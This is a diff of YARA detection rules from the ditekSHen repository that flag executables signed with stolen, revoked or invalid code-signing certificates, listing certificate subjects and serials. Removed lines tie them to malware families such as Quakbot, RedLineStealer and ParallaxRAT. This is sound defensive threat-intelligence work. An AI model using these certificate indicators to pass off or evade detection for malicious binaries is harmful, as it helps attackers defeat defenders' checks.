+		id = "85835042-a4ab-5cb2-963d-4ef776b740d1"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8431-L8444"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2965-L2976"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2de5a2d4d692c14660a9ec3ed18a7d2d6741a862c86812fcd640b1378281c328"
+		logic_hash = "b573853cfb28bdbda37c929834faa15475707684edfe99f14174599faf7b4fb6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7c81ba35732d1998def02461217cfd723150151bc93375a3e27c2cec33915660"
-		reason = "Quakbot"
+		thumbprint = "72ae9b9a32b4c16b5a94e2b4587bc51a91b27052"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Boo’s Q & Sweets Corporation" and pe.signatures [ i ] . serial == "26:f8:55:a2:58:90:b7:49:57:8f:13:e4:b9:45:97:68" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dedbfdefcac" and pe.signatures [ i ] . serial == "be:cd:4e:f5:5c:ed:54:e5:bc:de:59:5d:87:2a:e7:eb" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_25Ba18A267D6D8E08Ebc6E2457D58D1E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_55B5E1Cf84A89C4E023399784B42A268 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d2c4907e-cec2-5386-96d3-8c122c7557fa"
+		id = "de2890d4-3758-5e90-a9af-dc519f0b9e4c"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8446-L8459"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2978-L2989"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "38bdfa2291c7c3f81b29d41c65814002db3e4de11928699d2d946e87d313558d"
+		logic_hash = "37f08db5373cf46da7c0a4a03af21559fdcddb2481f935d5cece55a1fb4abc3c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e59824f73703461c2c170681872a28a9bc4731d4b49079aa3afba1d29f83d736"
-		reason = "BadNews"
+		thumbprint = "940345ed6266b67a768296ad49e51bbaa6ee8e97"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5Y TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "25:ba:18:a2:67:d6:d8:e0:8e:bc:6e:24:57:d5:8d:1e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fbbdefaccbbcdc" and pe.signatures [ i ] . serial == "55:b5:e1:cf:84:a8:9c:4e:02:33:99:78:4b:42:a2:68" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0A2787Fbb4627C91611573E323584113 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_84C3A47B739F1835D35B755D1E6741B5 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5da7ac8f-34f7-5949-9987-32e983a77ebe"
+		id = "00fba5a5-b87d-54f7-a5b8-f7b377af2202"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8461-L8474"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2991-L3002"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e4ea9149f28798b48482ff68c3e08593a4510e3bd01e49ebdca7d450f15537e4"
+		logic_hash = "6beb0966f2ed981c2e1a859ff9f659a566de867888123c387eeb89a97620345e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8badf05b1814d40fb7055283a69a0bc328943100fe12b629f1c14b9448163aac"
-		reason = "Malware"
+		thumbprint = "8057f20f9f385858416ec3c0bd77394eff595b69"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "exxon.com" and pe.signatures [ i ] . serial == "0a:27:87:fb:b4:62:7c:91:61:15:73:e3:23:58:41:13" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bddbdcfabededdeadbefed" and pe.signatures [ i ] . serial == "84:c3:a4:7b:73:9f:18:35:d3:5b:75:5d:1e:67:41:b5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_C81319D20C6F1F1Aec3398522189D90C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_28F6Ca1F249Cfb6Bdb16Bc57Aaf0Bd79 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d93f571b-49f6-5a8b-9478-1054ede2257f"
+		id = "b0568efe-d0cc-528d-a9b4-fdb8106c3d0f"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8476-L8489"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3004-L3015"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1271d0cc05d35a70a90f605e7c68fc52605570e453e9e67fbeb74762a88a0a96"
+		logic_hash = "c27ad7caa87b366593b82ff5e2b38bda5383e178e2cc01121aaaa5e90beaec86"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "18d8be8afa6613e2ef037598a6e08e0ef197d420f21aa4050f473fcabd16644a"
-		reason = "RedLineStealer"
+		thumbprint = "0811c227816282094d5212d3c9116593f70077ab"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and pe.signatures [ i ] . serial == "c8:13:19:d2:0c:6f:1f:1a:ec:33:98:52:21:89:d9:0c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cdcafaabbdcaaaeaaee" and pe.signatures [ i ] . serial == "28:f6:ca:1f:24:9c:fb:6b:db:16:bc:57:aa:f0:bd:79" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_77550Ed697992B397E3F1Ad8E2A662D1 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2C3E87B9D430C2F0B14Fc1152E961F1A : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "1d969340-de5e-569e-bfed-a80a1623d1b4"
+		id = "8e686e58-8fc5-50cf-9259-dcd70f5cc27b"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8491-L8504"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3017-L3028"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "87a70f10a111c4c5d1c3fb5b1c2a9da528f7d484ae6391c91e4052aba5c6bbe0"
+		logic_hash = "43a8f2d9055091f930af456abd334e38fb6a98bee3bfb8dcbf84c9563c777101"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0c439c7b60714158f62c45921caf30d17dae37ec6cbc2dfdd9d306e18ae6df63"
-		reason = "ParallaxRAT"
+		thumbprint = "80daa4ad14fc420d7708f2855e6fab085ca71980"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GRASS RAIN, s.r.o." and pe.signatures [ i ] . serial == "77:55:0e:d6:97:99:2b:39:7e:3f:1a:d8:e2:a6:62:d1" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Abfaacccde" and pe.signatures [ i ] . serial == "2c:3e:87:b9:d4:30:c2:f0:b1:4f:c1:15:2e:96:1f:1a" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_B1Bbef3Aba79Ab2Eae5B8015F26B34F8 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4808C88Ea243Eefa47610D5F5F0D02A2 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "382952bd-ffb3-5ff7-aff1-cf9fe8f20d1d"
+		id = "ea3aadc6-3edd-5e4b-adfe-824103531deb"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8506-L8519"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3030-L3041"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "34b00243f0b5e8d09938f1500871797125644f839298427c877801027638fd34"
+		logic_hash = "9fa722bfed0c31e263772615799bbdc054da1424b139c7d73e5755334fb86346"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "247a10fc20386f4f54b7451aecc2d97ec77567c5031028cc7f1b98f9191bee80"
-		reason = "NW0rm"
+		thumbprint = "5dc400de1133be3ff17ff09f8a1fd224b3615e5a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIDZHITAL ART, OOO" and pe.signatures [ i ] . serial == "b1:bb:ef:3a:ba:79:ab:2e:ae:5b:80:15:f2:6b:34:f8" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bfcdcdfcdfcaaeff" and pe.signatures [ i ] . serial == "48:08:c8:8e:a2:43:ee:fa:47:61:0d:5f:5f:0d:02:a2" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_05D50A0E09Bb9A836Ffb90A3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2F184A6F054Dc9F7C74A63714B14Ce33 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed AprelTech Silent Install Builder certificate"
 		author = "ditekSHen"
-		id = "f6947bf1-7f20-5be5-a242-c1025be40055"
+		id = "17797e5c-acf2-5c4e-b3e0-c48fb7bff996"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8521-L8534"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3043-L3054"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fc38ae0c9d4fc26739deab65ae3669f272e999b76dbc521dae04b9a3e3e7cef0"
+		logic_hash = "d14428b81b4ae4a77a517d2148f4b67b45963b71d998139b42ed4e4352fae6a5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2d072e0e80885a82d5e35806b052ca416994e0fe06da1cfdcebd509d967a1aae"
-		reason = "ParallaxRAT"
+		thumbprint = "ec9c6a537f6d7a0e63a4eb6aeb0df9d5b466cc58"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Toliz Info Tech Solutions INC." and pe.signatures [ i ] . serial == "05:d5:0a:0e:09:bb:9a:83:6f:fb:90:a3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APREL Tehnologija d.o.o." and pe.signatures [ i ] . serial == "2f:18:4a:6f:05:4d:c9:f7:c7:4a:63:71:4b:14:ce:33" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_623Eae6A66D3A6Ee80Df9Ccebe51181E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Ced72Cc75Aa0Ebce09Dc0283076Ce9B1 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7c3b85e4-8ce7-5c48-8f3b-e237a5cae9a0"
+		id = "7482c8a9-22d7-5ecf-951c-83818e2aeda7"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8536-L8549"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3056-L3067"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "79fceab5a19025d25abb12a8e6f57f8a930d348d538d9c556b6d4fc461af66f2"
+		logic_hash = "47fceb2a79271011bc6feed209ef4021db155dbc0fd4891f0dc1e900f2cb7fdb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "21c4e9af43068d041e6aec84341ae89cabb9917792c4bc372eced059555bb845"
-		reason = "Quakbot"
+		thumbprint = "db77b48a7f16fecd49029b65f122fa0782b4318f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GAIN AI LTD" and pe.signatures [ i ] . serial == "62:3e:ae:6a:66:d3:a6:ee:80:df:9c:ce:be:51:18:1e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Valerie LLC" and pe.signatures [ i ] . serial == "00:ce:d7:2c:c7:5a:a0:eb:ce:09:dc:02:83:07:6c:e9:b1" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0A392F03Ded5D73Cdeeda75052A57176 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_C4564802095258281A284809930Dcf43 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c0a8cc1c-7427-589b-9e32-8679e9cdf251"
+		id = "f70f481c-f5cf-5767-9fb0-0adecd0dc1f3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8551-L8564"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3069-L3080"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ea0159ec1c4670c1e961a87131998fa796cf205eaa8a06bf829c61c9694fa5ef"
+		logic_hash = "547613d507b04e3bd944515c77cb6ec161fe008b8e2b43cda574a46cbe2ef5ef"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cf1d95b39cc695e90dc2ca8b1b50f33b71f9f21091df2b72ed97f0759b5ddde4"
-		reason = "Quakbot"
+		thumbprint = "73db2555f20b171ce9502eb6507add9fa53a5bf3"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLOWER COMPUTERS LTD" and pe.signatures [ i ] . serial == "0a:39:2f:03:de:d5:d7:3c:de:ed:a7:50:52:a5:71:76" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cfeaaeedaefddfaaccefcdbae" and pe.signatures [ i ] . serial == "c4:56:48:02:09:52:58:28:1a:28:48:09:93:0d:cf:43" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3D31Ed3B22867F425Db86Fb532Eb449F : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "59e63c76-1051-5274-b886-fcd75c8b0b38"
+		id = "a9924b9e-381a-58b2-8839-fcafeb730a32"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8566-L8579"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3082-L3093"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "62b9ea3c5197635db2101972af951f4afbd9b311b3c8286525bbd5b5baa17c41"
+		logic_hash = "e3ec4fcd47867b688241dee693bcec98e633e179757ec8e7afd755c7d53a0cd7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0767b9ab857b8e24282b80a7368323689a842e6c8b5a00a4f965c03e375e8b0d"
-		reason = "Hive"
+		thumbprint = "1e708efa130d1e361afb76cc94ba22aca3553590"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Casta, s.r.o." and pe.signatures [ i ] . serial == "e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Badfcbdbcdbfafcaeebad" and pe.signatures [ i ] . serial == "3d:31:ed:3b:22:86:7f:42:5d:b8:6f:b5:32:eb:44:9f" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Da156922F4760E0C5F5Bcf79812A27E1 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_531549Ed4D2D53Fc7E1Beb47C6B13D58 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "065bacbc-3004-53c1-ba73-4779743e8221"
+		id = "6aec64ae-cda3-57e8-94c6-07c1e07d34ad"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8581-L8594"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3095-L3106"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f6dd0f2373e412a753cbe5e27152f48d6c8980de9b26e5ab212b926e7e41c813"
+		logic_hash = "554574657a913dbe0c576dbfcdd93a2494f2ffccf51eaabf06e5fafe2a895c3a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6e19e012f55e0bb44e9036d4445ab945942965dcb81b9ed24ad6fc17933c4fce"
-		reason = "Quakbot"
+		thumbprint = "a8e1f6e32e5342265dd3e28cc65060fb7221c529"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DRINK AND BUBBLE LTD" and pe.signatures [ i ] . serial == "da:15:69:22:f4:76:0e:0c:5f:5b:cf:79:81:2a:27:e1" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bdabfbdfbcbab" and pe.signatures [ i ] . serial == "53:15:49:ed:4d:2d:53:fc:7e:1b:eb:47:c6:b1:3d:58" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_8035Ed9C58Ea895505B05Ff926D486Bc : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "37d1061f-80b1-5944-bde3-6279633e321a"
+		id = "35b5d9a1-eaa8-53d8-9917-9a688fb95a04"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8596-L8609"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3108-L3119"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8fa1dad2cd4c1406c1346bbe0fef88eba415437d159cf9010dcfaaa7210aef0e"
+		logic_hash = "caf1c962a0f4bd6c90753c6f1f0a2acadafa5fde6c7dacd02a3ca5cc15446ab4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "92f005b9c46c7993205d9451823cf0410d1afbd7056a7dcdfa2b8b3da74ee1bf"
-		reason = "Quakbot"
+		thumbprint = "b82a7f87b7d7ccea50bba5fe8d8c1c745ebcb916"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALENTE SP Z O O" and pe.signatures [ i ] . serial == "52:26:a7:24:cf:a0:b4:bc:01:64:ec:da:3f:02:a3:dc" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fecddacdddfaadcddcabceded" and pe.signatures [ i ] . serial == "80:35:ed:9c:58:ea:89:55:05:b0:5f:f9:26:d4:86:bc" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_121070Be1E782F206985543Bc7Bc58B6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Ca646B4275406Df639Cf603756F63D77 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8432c7f0-ee2e-5935-8fe8-36b0094a5e1a"
+		id = "46603413-3e03-57d0-a141-1fee730de6c5"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8611-L8624"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3121-L3135"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "21eb6fed2225d2ab056948603b0990c2eb7dc9289da9a9df16f0d6cd042b3778"
+		logic_hash = "564ca7048413d6cd65371d65906132f62386410442b36b8bafeac5e09917465f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a4534aff03258589a2622398d1904d3bfd264c37e8649a68136f8d552f8b738f"
-		reason = "Quakbot"
+		thumbprint = "2a68cfad2d82caae48d4dcbb49aa73aaf3fe79dd"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Prod Can Holdings Inc." and pe.signatures [ i ] . serial == "12:10:70:be:1e:78:2f:20:69:85:54:3b:c7:bc:58:b6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SHOECORP LIMITED" and ( pe.signatures [ i ] . serial == "ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" or pe.signatures [ i ] . serial == "00:ca:64:6b:42:75:40:6d:f6:39:cf:60:37:56:f6:3d:77" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_15C21Dab7F4E644E4B35C4858004D8A9 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00E267Fdbdc16F22E8185D35C437F84C87 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "7dac5657-038f-5cbd-a854-cdb12921121e"
+		id = "520e335d-4b9f-5006-959a-1510312807be"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8626-L8639"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3137-L3148"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "646a858b10de89da4e639d3902ada78fad3a45868f0d7782546a865396cf226c"
+		logic_hash = "403f0f8a65997d27494d7ac4aa99cf5ebb1471839f67b2f8b380225a0263fd67"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "34a9cd401a5a86c5194954df3a497094c01b6603264aab5cf7d9b3c4a0074801"
-		reason = "Quakbot"
+		thumbprint = "cdf4a69402936ece82f3f9163e6cc648bcbb2680"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "P.REGO, s.r.o." and pe.signatures [ i ] . serial == "15:c2:1d:ab:7f:4e:64:4e:4b:35:c4:85:80:04:d8:a9" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APOTHEKA, s.r.o." and pe.signatures [ i ] . serial == "00:e2:67:fd:bd:c1:6f:22:e8:18:5d:35:c4:37:f8:4c:87" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_101D6A5A29D9A77807553Ceac669D853 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Taffias : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8554ce79-fd87-54ac-b538-e2899fe95414"
+		id = "7ace9b76-104c-511a-801b-0c2d5860eaba"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8641-L8654"
+		reference = "https://github.com/ditekshen/detection"
